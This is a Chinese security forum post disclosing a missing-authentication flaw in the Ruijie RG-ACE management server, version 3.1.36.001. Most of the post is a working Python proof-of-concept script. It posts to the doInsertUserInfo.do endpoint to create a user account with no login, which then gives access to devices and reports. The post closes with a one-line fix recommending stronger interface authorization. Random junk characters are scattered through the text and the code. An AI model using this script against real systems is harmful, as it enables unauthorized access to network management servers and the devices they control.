找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2676|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
6 }' Q9 t7 C; b4 q5 A% q/ z$ @7 ~# P& v% v% `( ?
2 K8 A4 }! l* Y
测试的具体版本是
) u* ~9 h' ]1 p. P" |, i( z产品名称: 锐捷应用控制引擎
6 _! J. n8 ~% a+ [8 Y- x7 w% r& f版本号: 3.1.36.001 TC
0 R: a6 T; ^  |' L: D& j0 O3 V编译时间: 2011042917306 n9 D; x; x, J3 D: a
' s7 z$ Z% Q& G) M

# L9 j/ E2 G/ y% u) o5 s漏洞证明:. u0 g; l! A" A/ Z8 Q6 y

3 H9 r: F0 u* w/ \5 f
2 b8 D4 |' d, |( l; j/ c# q8 H) m! e. I  z) X! J: I

# S  ]8 w. z$ d5 X$ a+ C& U9 e5 b1 M" B5 R
) w  W& b! c: H( R# U& B) B
执行脚本( c2 {0 I& [* F" L! m4 Z* b
#! /usr/bin/env python
1 ?, h5 F$ L1 \7 n3 \' C#coding=gbk
- `0 N) S2 J5 Z% p+ C; J! ^, ?% y#RG-ACE管理服务器 V3.1.36.001+ r, C: \5 m6 H5 L4 _
import urllib2, urllib,cookielib
8 o) D' Z# ^( C' G$ o" g& p' nurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP& t5 H# C3 }' x1 t) S. b' n- f% S2 n
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( Q( J# O# R; y# g" dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]1 @3 d4 u7 a4 P
post=(("event","userManager.doInsertUserInfo"),
4 X' l/ R' h" a7 J("useractionname","addButtonValue"),9 m/ d8 C5 H4 U3 O# Z7 u
("useropermanager","userManager")," n. ^$ a% \+ t! E
("userName","t"), #######账号自己加  \* ]1 I: H7 V
("pwd","aaaaaa"),######密码自己加2 d& M  m! ?3 n& U, `' T# d
("trueName","ad"),) }: t0 u( @7 L3 \3 `& [
("email",""),. ~5 v% R4 h0 o
("mobilePhone",""),
9 u* x3 X5 \9 {5 B1 ~("officePhone",""),, C  t+ Z) d2 {9 y9 a
("addr",""),
8 D1 y* l5 T5 w0 {: ^5 m("submit","确定"))/ `+ |* _& o! z; h+ ^
urllib2.install_opener(opener)" D: E# u, O1 x) E. a$ `0 W( B0 a" G
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
! X# q1 J6 f0 ^6 W- R( m: S% cprint "Done"
& B7 Q& I9 G9 |% f. Z0 W) a5 g( i; }" U. K1 r2 @
登录,连接设备2 Y3 \8 d' F; ^1 \1 z1 Y6 v

4 a, w. O$ _2 j' Y
4 g: J; m, [& `# Z# a9 ~  U9 r4 |
5 b0 Z' Z* Y$ G. V: E& I6 m
; ^0 C( R6 x  Z4 P1 @3 r; Y. s
默认的管理员admin权限更大点+ }6 O. T# Q6 i. L+ J. K

$ f: f- d4 ^5 W# |: c' a. F$ S
8 F, y1 U! b% {' a7 \
: v; O4 X( y1 x) K   R+ n2 e7 l% S
0 u) q! k- d# _$ r9 {' B& Z1 d) _
修复方案:
+ W  v7 ~$ X; @, w$ E0 [* ~# W加强对接口的权限验证
; e3 _; J- C7 |" Y# s9 f
( l5 J% W; Z( _8 }2 R! U$ |% Q' m: M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表